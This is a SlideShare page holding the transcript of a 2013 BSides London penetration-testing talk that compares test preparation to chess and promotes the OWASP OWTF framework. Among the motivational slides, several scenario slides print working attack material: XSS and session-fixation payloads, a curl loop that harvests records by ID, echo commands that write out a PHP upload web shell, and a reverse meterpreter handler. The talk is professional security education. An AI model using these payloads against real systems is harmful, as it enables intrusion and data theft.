Your SlideShare is downloading. ×
0
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Pentesting like a grandmaster BSides London 2013

6,299

Published on

Demos: http://www.youtube.com/playlist?list=PL3SqEmKhsxzzUIG1oIOUw3UeK0euTSTNH …

Demos: http://www.youtube.com/playlist?list=PL3SqEmKhsxzzUIG1oIOUw3UeK0euTSTNH

Chess is a complex game: The number of permutations is just too great to compute the best possible move during a game. This is similar to pen testing in that we also have too many vulnerabilities to find and choose from not only on a 1 by 1 basis but also how we would chain them together like a real attacker.
Chess players must analyse efficiently to beat time constraints like pentesters but unlike pentesters they have been doing this for a long time.
The purpose of this talk is to expose the techniques chess players have been using for centuries and to illustrate how we can learn from these and apply them to pen testing. The talk will behighly practical and will show how these techniques have been incorporated into OWTF, not only with screenshots but also demos.
Have you ever had to spend valuable time in the middle of a test to prepare something you could have prepared in advance? Did you ever analyse a vulnerability/attack-path in depth only to find a significantly easier to exploit vulnerability hours/days after? Pen testing is very similar to playing chess: It is easy to get carried on and waste valuable analysis time on a line of attack that is just not the best option. Maybe mistakes like this will be a bit less likely after attending this talk.

0 Comments
8 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
6,299
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
156
Comments
0
Likes
8
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Pentesting like aGrandmasterAbraham Aranguren@7a_ @owtfpabraham.aranguren@owasp.orghttp://7-a.orghttp://owtf.orgBSides London, 24th April 2013
  • 2. Agenda• Intro• What makes a great player/tester• Hacking is like Chess• Intelligence = 1 variable• Strength of Play Factors1. Individual Skill2. Game Preparation3. Game Performance• OWASP OWTF in 5 minutes• Pwnage and WIN scenarios• Conclusion• Q&A
  • 3. About me• Spanish dude• Uni: Degree, InfoSec research + honour mark• IT: Since 2000, defensive sec as netadmin / developer• (Offensive) InfoSec: Since 2007• OSCP, CISSP, GWEB, CEH, MCSE, etc.• WebAppSec and Dev/Architect• Infosec consultant, blogger, VSA, OWTF, GIAC, BeEF
  • 4. Disclaimer II am..• NOT a grandmaster• NOT that smart• NOT a rockstar like HD Moore, etc.BUT using these techniques I could outperform people:• Smarter than me• With more experience than me• Way more skilled than me
  • 5. Disclaimer IISome of the people I will use for examples have donehorrible/stupid/inappropriate things such as:• Biting off somebody’s ear (Tyson)• Having affairs outside of marriage (Arnold,Capablanca)• Endorse Scientology (Will Smith)• Anti-Semitism (Bobby Fischer), etcThis talk focuses on what it took these and other peopleto succeed and how we can learn from that ONLYCelebrity FAIL would be a whole different talk ☺
  • 6. Hacking is like Chesshttp://imgur.com/YAnUh
  • 7. Hacking is like Chesshttp://imgur.com/YAnUh
  • 8. Hacking is like Chesshttp://imgur.com/YAnUh
  • 9. Intelligence = 1 variableSo you watched these guys ...… and (maybe) you thought:“I am just not smart enough…”HD Moore Dan Kaminski
  • 10. How far can you getwith“modest intelligence”in life?
  • 11. Success is PossibleSuccess is possible for people with IQs < 160:• 78: Muhammad Ali: “The greatest of all time” > 80%?• 98: George H.W. Bush: US president > 70% people• 110: Dr. Karl: Science freak on Triple J > 40% people• 135: Arnold Schwarzenegger: Success BEAST 2% people• 135: Garry Kasparov: Word Chess Champion 2% peopleRecommended reading:http://garthzietsman.blogspot.com/2012/03/chess-intelligence-and-winning.html
  • 12. High IQ != Guaranteed success“Very high genius IQ”: A Motorcycle mechanic who hangsout with biker gangs and is frequently in and out of jail“Highest IQ in North America”: A bouncer in a bar,minimum wage, lives in a tiny garagehttp://iq-test.learninginfo.org/iq07.htm
  • 13. Chess ELO vs. IQ (rough)Sources:http://www.sigmasociety.com/old/medias_qi.htmlhttp://www.jlevitt.dircon.co.uk/iq.htmhttp://www.ifvll.ethz.ch/people/sterne/Grabner_Stern_Neubauer_Acta_2006.pdfhttp://garthzietsman.blogspot.com/2012/03/chess-intelligence-and-winning.html
  • 14. Strength of PlayFactors
  • 15. Strength of Play FactorsMajor strength of play factors:1. Individual Skill: Years Training, experience2. Game Preparation: Days/Weeks/Months Game-specific3. Game Performance: 1 minute - 2.5 hoursEqual importance:• FAIL: Individual Skill without game preparation• FAIL: Game preparation without some Individual Skill• FAIL: Game performance without preparation or skillNOTE: In Security testing “The Game” might be 5 days,2 weeks, etc. but the same rules apply…
  • 16. 1. Individual Skill
  • 17. Start Early = AdvantageMost World Chess Champions learned to play early:• 4 years old: Capablanca• 4 years old: Euwe• 4 years old: Karpov• 5 years old: Alekhine• 5 years old: Kasparov• 6 years old: Fischer• 8 years old: TalBUT some started a bit later:• 12 years old: BotvinnikSome argued this “weakness” showed in some of his gamesSame goes for technology, programming, security, etc:Starting early == More total time to learn == Advantage
  • 18. Will Smith: Talent vs. Skill“… talent you have naturally, skill is only developed byhours and hours and hours of beating on your craft. …where I excel is ridiculous, sickening, work ethic: While theother guy is sleeping I’m working, while the other guy iseating I’m working…”“.. talent is going to fail you if you arenot skilled: if you don’t study, if youdon’t work really hard and dedicateyourself to being better every single day..”http://www.youtube.com/watch?v=DNqQ5JAY88c
  • 19. Relentless Passion: Fischer“You can only get good at chess if you love the game.”“Chess demands total concentration and a love for the game.”“I give 98 percent of my mental energy to chess. Others giveonly 2 percent.”
  • 20. Relentless Passion: LarryLarry Pesce from PaulDotCom (paraphrasing quote):“…I just don’t stop: Since I wake up until I go to bed I amtrying things out and doing research on my laptop, evenbeside my wife as she watches TV..”
  • 21. Rule 5: Work your butt off“…Leaving no stone unturned… no pain no gain … soyeah .. Partying, washing around .. Someone out there atthe same time is working hard, someone is getting smarterand someone is winning, just remember that … there isabsolutely no way around hard hard work”Arnold’s 6 Rules of success: http://www.youtube.com/watch?v=Y7zntXR-VmA
  • 22. Pain is temporary: Ali“Pain is temporary, it may last a minute, an hour or even ayear, but eventually, it will subside and something else willtake its place .. At the end of pain is success: You are notgoing down because you feel a little pain!”“I’m exactly where I want to bebecause I realize I gotta commit myvery being to this thing , I gottabreathe it, I gotta eat it, I gotta sleepit and until you get there you’ll neverbe successful in life but once you getthere I guarantee you the world isyours so work hard and you can havewhatever it is you want.”http://www.youtube.com/watch?v=7pE4m2THO_U
  • 23. Discipline"...People whod want to be inmy shoes they really think sobecause they think: wow, theydmake money theyd be richBUT if they had to go throughsome of the things I had to gothrough I think theyd cry,sometimes is so depressive... thats what discipline is,discipline is going in anddoing something that you dontwanna do but you do it likeyou love it...“http://www.youtube.com/watch?v=drmBziMus9E
  • 24. What’s the difference“... these successful people realise that they have anallotted time to perform a given test so that they have togive it their absolute all to doing that test ...…these people gave it their heart and their soul,throughout every single rep, every single set, every singlegym session, every single day for weeks, for months, foryears, for decades to get to where they were…... that they were going to break through all mentalbarriers to get to where they wanted to be and that is thedifference between the successful people and those who arenot” - Jaret Grossmanhttp://www.youtube.com/watch?v=Sk56VxaeqEQ
  • 25. How to stay motivatedhttp://smileyandwest.ning.com/profiles/blogs/the-subconscious-mind-re-focusYour subconscious will believe what you tell it!.. and what others tell it too! (i.e. “you will never X”)Repeating your goals to your subconscious builds drive:99% of successful people do this (consciously or not)
  • 26. Stay healthyDan Kaminski and Alex Hutton, enjoying a Mojito, Brucon 2011
  • 27. Dr Layne Norton PhD: Deadlift tips“…staying healthy is a huge thing because if you are hurt,you can’t lift, you can’t get better … and consistency …you keep accumulating small improvements overtime…“http://www.youtube.com/watch?v=IWRReBFHvAg – min ~ 1:10
  • 28. “Smart people learn from their own mistakes…… Really smart people learn from other people’s mistakes”
  • 29. Stay healthy: AlekhineWorld Champion 1927-35 + 1937-46Loss of the title (1935): “Kmoch wrote thatAlekhine drank no alcohol for the firsthalf the match, but later took a glassbefore most games”http://en.wikipedia.org/wiki/Alexander_AlekhineRecovery of the title (1937): “Euwe lost thetitle to Alekhine in a rematch in 1937, alsoplayed in The Netherlands, by thelopsided margin of 15½–9½. Alekhinehad given up alcohol to prepare for therematch, although he would startdrinking again later”http://en.wikipedia.org/wiki/Max_Euwe
  • 30. Stay healthy: TalCould the youngest* (24) Chess World Champion keep his crownfor more than 1 year? .. Of course! (*Kasparov’s 22 was later)World Champion 1960–61“…bohemian life of chess playing, heavydrinking and chain smoking.. his healthsuffered … spent much time in hospital.. remove a kidney in 1969… brieflyaddicted to morphine due to intensepain …On May 28, 1992, dying from kidneyfailure, left hospital to play at theMoscow blitz tournament, wherehe defeated Garry Kasparov”http://en.wikipedia.org/wiki/Mikhail_Tal
  • 31. Stay healthy: FischerWorld Champion 1972-75“Before and during the match, Fischer paidspecial attention to his physical trainingand fitness, which was a relatively novelapproach for top chess players at that time,He had developed his tennis skills to agood level, and played frequently …and swam for extended periods, usuallylate at night…”http://en.wikipedia.org/wiki/Bobby_fischer“Your body has to be in top condition. Your chessdeteriorates as your body does. You cant separate bodyfrom mind.” – Bobby Fischer
  • 32. Stay healthy: KasparovWorld Champion 1985–2000“Every morning, he ran barefoot for twoand a half miles along the beach, andafterward he swam just beyond thebreaking surf or played tennis on a courtnestled in the woods behind the house..After lunch and a nap, he spent five orsix hours at the chessboard…”http://www.nytimes.com/1990/10/07/magazine/king-kasparov.html
  • 33. Practical Tips“Just” (!) don’t stop:• Find things that motivate YOU and listen, etc to that:Search youtube for “motivation”, get mp3 from video, etc.• Read a lot: papers, presentations, PoCs, etc• Watch a lot: Webinars, Talks, demos• Practice a lot: Focus on what interests/motivates you• Listen a lot: InfoSec podcastsPodcasts are awesome to keep learning while you do younon-intellectual activities such as:Cooking, cleaning, tidying-up, driving, etcIf you are a podcaster:Minimise the fillers or you’ll lose your audience(skipping is annoying + unpractical while driving, etc)
  • 34. Don’t Fry your CNSIf you work hard be careful you don’t fry your CNS:Your central nervous system (CNS) has finite recovery abilityYou know you’ve fried your CNS when:• You (surprisingly) get sick• Your mental/physical performance drops• Caffeine doesn’t work• You feel like you need to sleep all day: tiredness, etcIf this happens you need to:• Sleep without alarms for 10 days (try 1 x week after fix)• Clean-up your diet + Exercise• Caffeine: Avoid it or cycle itCycle caffeine on and off: Use “on” days and “off” daysUse caffeine early in the day: Clear it fully before sleep!
  • 35. Suggested watchingAwesome talk explaining what it takes to build upindividual skill:Haroon Meer - You and Your Researchhttp://www.youtube.com/watch?v=JoVx_-bM8TgAlso worth a look:http://www.slideshare.net/reidhoffman/startup-of-you-visual-summary
  • 36. 2. Game PreparationCan happen:• Before the game / pentest:Goals:• Scope better• Do better2) During a tournament / pentest:Goals:• React to the unexpected• Avoid detection• Prepare an attack
  • 37. Chess Player approachChess players:• Memorise openings• Memorise endings• Memorise entire lines of attack/defence• Try hard to analyse games efficientlyPen tester translation:• Chess players precompute all they can• Chess players analyse info only onceChess player prep (simplified ☺):1. Find + prep exploits for opponent weaknesses2. Precompute an obscure opening: best repliesanalysed at home for weeks/months3. Kick the opponent out of precomputation with it
  • 38. Alekhine vs CapablancaWorld Championship Match 1927
  • 39. Alekhine vs CapablancaWorld Championship Match 1927.. Alekhines victory surprised almost the entire chess world.Capablanca entered the match with no technical or physicalpreparation, while Alekhine got himself into good physicalcondition, and had thoroughly studied Capablancas play.According to Kasparov, Alekhines research uncovered manysmall inaccuracies.Luděk Pachman suggested that Capablanca, who wasunaccustomed to losing games or to any other type of setback,became depressed over his unnecessary loss of the eleventhgame..http://en.wikipedia.org/wiki/Jos%C3%A9_Ra%C3%BAl_CapablancaPhysical Prep + Opponent Research + Mental toughness = WIN
  • 40. Garry Kasparov vs Nigel ShortWorld Championship Match 1993
  • 41. July 1993 FIDE (ELO) rating list. Top 10 players1 Kasparov, Gary.................... RUS 2815 stronger2 Karpov, Anatoly................... RUS 2760…10 Short, Nigel...................... ENG 2665 weakerhttp://chess.eusa.ed.ac.uk/Chess/Trivia/AlltimeList.html“In 1993 Nigel Short played Garry Kasparov ..Nigel Short had won matches againstformer world champion Anatoly Karpov and Jan Timmanon his way to meeting Kasparov.”http://www.supreme-chess.com/famous-chess-players/nigel-short.htmlMatch Context
  • 42. Nigel Short’s Prep surprises Kasparov“Kasparov was evidently disoriented as he used 1hour 29 minutes to Shorts 11 minutes(!) for theentire game.“ Short (weaker) was 8 times fasterhttp://www.chessgames.com/perl/chessgame?gid=1070677
  • 43. Kasparov + team strike back“In just (!) 9 days after facing it for the first time …Kasparov and his team had found the best reply (11.Ne2) and even succeeded in completely bamboozling Shortwith 12.Be5” “This move was a surprise for me. I spent45 minutes on my reply. I could not fathom out thecomplications … “ – Nigel Shorthttp://www.chessgames.com/perl/chessgame?gid=1070681
  • 44. Anti-Chess Prep: Random ChessFischer complained … that because of the progress inopenings and the memorization of opening books, thebest players from history, if brought back from the dead toplay today, would no longer be competitive."Some kid of fourteen today, or even younger, could getan opening advantage against Capablanca"http://en.wikipedia.org/wiki/Bobby_fischer#Fischer_Random_Chess
  • 45. Pwn2Own: Headlines vs. PrepHeadline“Apples Leopard hacked in 30 seconds”http://www.zdnet.com/apples-leopard-hacked-in-30-seconds-1339287733/RealityCharlie Miller on his own prep (2008):“… It took us a couple of days to find something, then therest of the week to work up an exploit and test it. It tookus maybe a week altogether”http://www.roughlydrafted.com/2008/03/29/mac-shot-first-10-reasons-why-cansecwest-targets-apple/Bottom line1 week of prep for a 30 second attack
  • 46. Pwn2Own: Stephen Fewer’s prep“Fewer says that the successful exploit required use ofthree separate vulnerabilities:• Two to achieve successful code execution within thebrowser• and then a third to escape Internet ExplorersProtected Mode sandbox.Putting together the successful attack took Fewer fiveto six weeks.”http://arstechnica.com/security/2011/03/pwn2own-day-one-safari-ie8-fall-chrome-unchallenged/
  • 47. Chris Nickerson on Prep“.. If you do the properintelligence gathering you canplan an attack that will workand I say that because you willNOT get stopped: … if you getstopped, it is your fault for notdoing enough intelligencegathering so remember it nexttime”http://blog.securityactive.co.uk/2009/10/19/chris-nickerson-red-and-tiger-team-testing-brucon-2009/ - min ~16
  • 48. Kevin Mitnick’s Prep“.. we can setup their environment in our lab, and …we can…exploit our own environment … this was doing a lot ofwork prior to the attack: Finding out the AV, finding outthe target system and working on bypassing UAC beforethe client was even hit … And then when we did the attackit worked flawlessly the first time … I think the upfrontpreparation is really critical to be successful in this stuff”http://vimeo.com/31663242 - minutes: ~19 + 32:48
  • 49. OSCP results from 200824h hacking challenge: Nessus, etc. forbidden, scripts ok.9-10 hours (test)19 hours (test)5 hours (sleep)24 hoursTime100%100% WTF?FAIL WTF?Gameperformance?(less than me?)1-1,5 months(with a day job)0? (maybe onlystudying?)Game prep7? (12 in 2013)< 1 year(weak!)5-10 years?IndividualSkillMatteo Memelli(ryujin)Me (1st try)2 x respectedSecurity ProsStrength of PlayMatteo was x2 faster, but you can’t get more than 100% ☺Game prep was critical to outperform stronger test takers
  • 50. My Strategy: Serious prepKnowing myself (Pre-prep self-feelings at the time)• Strength: Coding (dev background = edge over net guys)• Top Likely Weakness: Time (weaker = slower)Knowing the “enemy” (The 24 hour hacking challenge)• Tough test: Most people failed (based on IRC)• Scripts allowed, Nessus, etc forbidden• Watch purehate’s videos, for ideas, etc really helpfulBattle prep plan• Heavy Scripting: Reduce time for uncreative work• Heavy Practice:Necessary to be faster on more creative/harder to automate work(exploitation, escalation, etc). All exercises, extra miles, etc.• Podcast Abuse: 3 years of PaulDotCom in 1 month!
  • 51. Script 1: ProberProbe more likely open ports first until a full scan complete:• 1st wave: scan + probe top 100 TCP ports + SNMP(awesome) results in 5 minutes!• 2nd wave: scan + probe next 900 TCP ports + few UDP• 3rd wave: scan remaining TCP ports (slower)• 4th wave: scan remaining UDP ports (super-slow)• For each wave: Group report 1 thing to look atSummary:• Staged: Fast results (5-10 minutes for 1st wave)• Reliable: Even monitored free RAM, etc. beforelaunching things (to avoid crashing my own machine!)• Auto-Pilot: No supervision required (!babysitting)
  • 52. Script 2: ReporterA separate script generated partial reports at any time:I could see the partial probing results and work from therevery quickly though a clickable web page.No waiting until all the probes finished. critical
  • 53. The Advantage of organised infoOthers spent valuable energy to run (a lot of) tools byhand (12+ terminals open to babysit, etc)…… I had this in < 10 minutes via scripts!:
  • 54. When Prep FAILsWhatever you do prep will fail sooner or laterOption 1) Take the hit: Consider nights, weekends,etc. this will pay off in the test and your futureassessments, view it as a "paid trainingopportunity“Option 2) Ask for an extension: Find a good reason +Negotiate an extension with your customerOption 3) Ask for a delay: Take the hit withoutdisrupting your life that much (maybe ☺)Option 4) All of the above ☺
  • 55. 3. Game Performance
  • 56. http://www.securitygeneration.com/security/pic-of-the-week-real-world-penetration-testing/
  • 57. http://www.slideshare.net/bsideslondon/breaking-entering-and-pentesting
  • 58. Mental Toughness: KarpovKarpov: World Champion 1975–85…“.. I could resist in positions whereother players probably would resign.And I was finding interesting ideas onhow to defend difficult positions and Icould save many games. ..I never gaveup…you try to find the best move whateverthe position is, because many peoplethey say, okay, this is bad and thenthey lose will to fight. I never lost thewill to fight.”http://bigthink.com/videos/the-value-of-mental-toughness
  • 59. Efficient Chess AnalysisFrom Alexander Kotov - "Think like a Grandmaster":1) Draw a list of candidate moves (3-4) 1st Sweep (!deep)2) Analyse each variation only once (!) 2nd Sweep (deep)3) After step 1 and 2 make a move1) Draw up a list of candidate paths of attack2) Analyse [ tool output + other info ] once and only once3) After 1) and 2) exploit the best path of attackEver analysed X in depth to only see “super-Y” later?
  • 60. In 5 minutesPutting it all together:
  • 61. Plugin Types (-t)At least 50% (32 out of 64) of the tests in the OWASP Testing guide can belegally* performed at least partially without permission* Except in Spain, where visiting a page can be illegal ☺* This is only my interpretation and not that of my employer + might not apply to your country!
  • 62. A Pentester “cheating try”Offensive (Web) Testing Framework = Multi-level “cheating” tactics
  • 63. OWTF’s Chess-like approachKasparov against Deep Blue - http://www.robotikka.com
  • 64. Scenario 1: SummaryPre-Engagement: No permission to test Game prep1) Run passive plugins legit + no traffic to targetSitefinity CMS found2) Identify best path of attack:• Sitefinity default admin password• Public sitefinity shell upload exploitsEngagement: Permission to test Game performance1) Try best path of attack first
  • 65. Scenario 1: Demo
  • 66. Scenario 1: Outcome!!1 minute after getting permission …
  • 67. Scenario 1: Outcome!!5 minutes after getting permission …
  • 68. Scenario 2: SummaryAttack preparation (pre-engagement safe) Game prep1) Run semi-passive plugins legitMissconfigured crossdomain, fingerprint wordpress version2) Identify best path of attack:crossdomain + phishing + wordpress plugin upload + meterpreter3) Replicate customer environment in lab4) Prep attack: Adapt public payloads to target5) Test in labLaunching the attack Game performance1) Tested attack works flawlessly on the first shot2) Pivot3) Show impact
  • 69. Scenario 2: Demo
  • 70. Scenario 3: SummaryPre-Engagement: No permission to test Game prep1) Mapping the application you notice….. https://target.com/reports/rwservlet/Auth bypass vuln by design: Oracle reports accessible without auth2) Identify best path of attack:Use the reporting GUI ☺Engagement: Permission to test Game performance1) Pwn customer on “minute 1”:Use the reporting GUI ☺
  • 71. Scenario 3: Impact
  • 72. Scenario 3: Impact
  • 73. Scenario 3: Vuln Examples ☺
  • 74. Scenario 4: SummaryPre-Engagement: No permission to test Game prep1) .NET app: OMG they have a firewall ☺2) Hmm they also have an XML file upload!3) Identify best path of attack:XSS via encoded field in XML file upload&lt;iframe onload=&quot;javascript:ALERT(OWNED)&quot;src=&quot;http://www.google.com&quot;&gt;&lt;/iframe&gt;Engagement: Permission to test Game performance1) Pwn customer on “minute 1”:Persistent XSS via XML upload
  • 75. Scenario 4: PoC
  • 76. Scenario 5: SummaryPre-Engagement: No permission to test Game prep• File upload check: Can upload doc files2) Noting URL:http://target.com/attachments/..........._test.doc3) Log out4) Try to get uploaded file: Success Auth bypass5) Prepare attack:Write script to download all documentsEngagement: Permission to test Game performance1) Pwn customer on “minute 1”:Run script
  • 77. Scenario 6: Summary1) Session Id does not change after login2) Got XSS3) Prepping XSS + Session fixation exploit:https://target.com/sample.php?Code=><script>document.cookie=PHPSESSID=3ssc1h5464qonvhuq3gm5u49q6;path=/; window.location=https://target.com/login/;</script><brBottom line: Session fixation through XSS is possible
  • 78. Scenario 7: Summary1) Site A makes a request to Site B with NO security tokens2) Site A retrieves sensitive info from Site B using 1)3) Problem verification:curl --referer https://target.com/demo.phphttp://target2.com/demo.jsp?userid=xxxxxxx&examid=xxxxxxxx| lynx --dump -stdin|moreQuick Exploit: Downloads arbitrary exam reports..for i in $(php -r echo implode(" ",range(11200,16000));); doecho "Trying $i .."; curl … > tmp.html ;BAD=$(grep 500 - Internal server error tmp.html|wc -l);if [ $BAD -eq 0 ]; thencp tmp.html $i.html; # Got a hitfidone
  • 79. Scenario 8: AppSec2NetSec1) Initial scope: 1 app server on cloud provider2) File Upload vuln3) Getting a nice shell4) Run keylogger5) Mapped hosts6) Reused passwords7) Pwned 17 servers (GUI access on 16)8) No admin detected the attack ☺
  • 80. Scenario 8: AppSec2NetSec2) Classic File upload, Null character and shellSmall gotcha: Image had to be valid so I used a GIF file withPHP code in the comment (using GIMP)
  • 81. Scenario 8: AppSec2NetSec3) Shell is only the beginning, you know? ☺In windows, by default (i.e. next / next / finish install) Apacheruns as SYSTEM, i.e. more than Admin, no need to escalate ☺
  • 82. Scenario 8: AppSec2NetSec3) Getting comfortable (no tftp, etc)Creating a file upload PHP shell from a DOS shell..NOTE: “^” is a escape character in windowsecho ^<?php > file_upload.phpecho if (isset($_POST[Action]) ^&^& $_POST[Action] == go) { >> file_upload.phpecho if (@move_uploaded_file($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) == false) { >> file_upload.phpecho die(Error when uploading: .$_FILES[MyFile][error]); >> file_upload.phpecho } >> file_upload.phpecho else { >> file_upload.phpecho echo upload ok!; >> file_upload.phpecho } >> file_upload.phpecho } >> file_upload.phpecho ?^> >> file_upload.phpecho ^<html^>^<form action="" enctype="multipart/form-data" name="myform"id="myform" method="post"^>^<input type="hidden" name="Action" value="go" /^>^<input type="file" name="MyFile" id="MyFile" value="" size="80" maxlength="255"/^>^<input type="submit" name="send" value="Submit" /^>^</form^>^</html^> >>file_upload.php
  • 83. Scenario 8: AppSec2NetSec3) Now we’re ready to upload a reverse meterpreter shell ☺
  • 84. Scenario 8: AppSec2NetSecCheck before meterpreter upload: AV Fingerprint via ‘tasklist’
  • 85. Scenario 8: AppSec2NetSecYou are totally blocking port 80 outbound, huh? ☺# /pentest/exploits/framework3/msfcli multi/handlerPAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.0.127LPORT=80 E…
  • 86. Scenario 8: AppSec2NetSecLM hashes were disabled, NT LM hashes were tough to crack .. Time to improvise
  • 87. Scenario 8: AppSec2NetSecMap network with arp –a, etc via winenum: winenum is very scary…
  • 88. Scenario 8: AppSec2NetSecGetting GUI access:
  • 89. Scenario 8: AppSec2NetSecNo need to crack our own password ☺
  • 90. Scenario 8: AppSec2NetSecIf you can’t crack passwords you might be able to steal them..Patience is worth its prize…
  • 91. Scenario 8: AppSec2NetSecWhile you are waiting, you might as well dump memory..
  • 92. Scenario 8: AppSec2NetSecPivoting around using stolen passwords..
  • 93. Scenario 8: AppSec2NetSecPivoting .. Where? ☺ Approach 1) Run History
  • 94. Scenario 8: AppSec2NetSecApproach 2) Merge winenum infoPASSIVE Ping Sweep: Unique IPs & MACs from theARP table of all popped boxes via winenum
  • 95. Scenario 8: AppSec2NetSecPASSIVE Local “Port scanning” from winenum
  • 96. Scenario 8: AppSec2NetSecDon’t forget about IPv6 & UDP ☺
  • 97. Scenario 8: AppSec2NetSecPASSIVE Remote “Port scanning” from winenumvia active connections
  • 98. Scenario 8: AppSec2NetSecAdmin shares (c$, d$, etc), SSL private keys, ..
  • 99. Scenario 8: AppSec2NetSecSo you have hard-coded credentials in your scripts?
  • 100. Scenario 8: AppSec2NetSecLet’s try those …
  • 101. Scenario 8: AppSec2NetSecTrying…
  • 102. Scenario 8: AppSec2NetSecSeeing the shares thanks to your script credentials:
  • 103. Scenario 8: AppSec2NetSecDoes your application store user credentials inclear-text on the user session files?
  • 104. Scenario 8: AppSec2NetSecYup ☺
  • 105. Scenario 8: AppSec2NetSecAnd my personal favourite (only had to click OK ☺):
  • 106. Conclusion3 Strength Factors:1) Individual Skill• Skill > Intelligence + Talent (Hard work beats talent)• Hack your subconscious (!mental barriers)• Don’t stop: Eat it, breathe it, sleep it2) Game preparation• Prep ahead: Recon + analysis + plan• Scope like a pro: Negotiate scope, extensions, etc.3) Game performance• 1st Sweep: Shallow + wide analysis first• 2nd Sweep: Deep + narrow analysis of best options• Analyse only once•Don’t lose the will to fight + Take the hit
  • 107. Thanks to Brucon 5by5Brucon 5by5 sponsorship of OWASP OWTFhttp://blog.brucon.org/2013/02/the-5by5-race-is-on.html
  • 108. Thanks to OWASP GSoC 2013Google Student sponsorship of OWASP OWTFhttps://www.owasp.org/index.php/GSoCStudent Proposals: April 22th-May 3rd 2013 Still on time!
